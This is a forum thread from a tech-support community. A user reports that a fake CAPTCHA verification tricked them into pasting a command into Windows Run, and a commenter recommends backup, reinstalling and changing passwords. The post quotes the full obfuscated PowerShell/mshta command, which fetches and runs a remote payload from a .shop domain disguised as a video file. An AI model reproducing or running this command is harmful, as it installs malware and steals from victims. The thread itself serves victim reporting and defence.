this post was submitted on 02 Apr 2025
6 points (71.4% liked)

techsupport

2719 readers
12 users here now

The Lemmy community will help you with your tech problems and questions about anything here. Do not be shy, we will try to help you.

If something works or if you find a solution to your problem let us know it will be greatly apreciated.

Rules: instance rules + stay on topic

Partnered communities:

You Should Know

Reddit

Software gore

Recommendations

founded 2 years ago
MODERATORS
 

I accidentally executed

POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''

via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.

What should I do? is full system wipe necessary? or can I remove it somehow?

If I need to do a system format what about attached drives and other devices on the network?

you are viewing a single comment's thread
view the rest of the comments
[–] [email protected] 4 points 2 days ago* (last edited 2 days ago)

Hackers have been figuring out a variety of nifty ways to trigger powershell commands for nefarious purposes. For whatever it's worth, I'm glad you spotted it. As the other commenter suggested, I'd recommend a full data backup and ~~reinstall Windows~~ install Linux. And change your passwords and shit.

Also, this video from ThioJoe is very relevant and revealing as to how sneaky these sort of attacks can be...

https://youtube.com/watch?v=0x5qAc85PvQ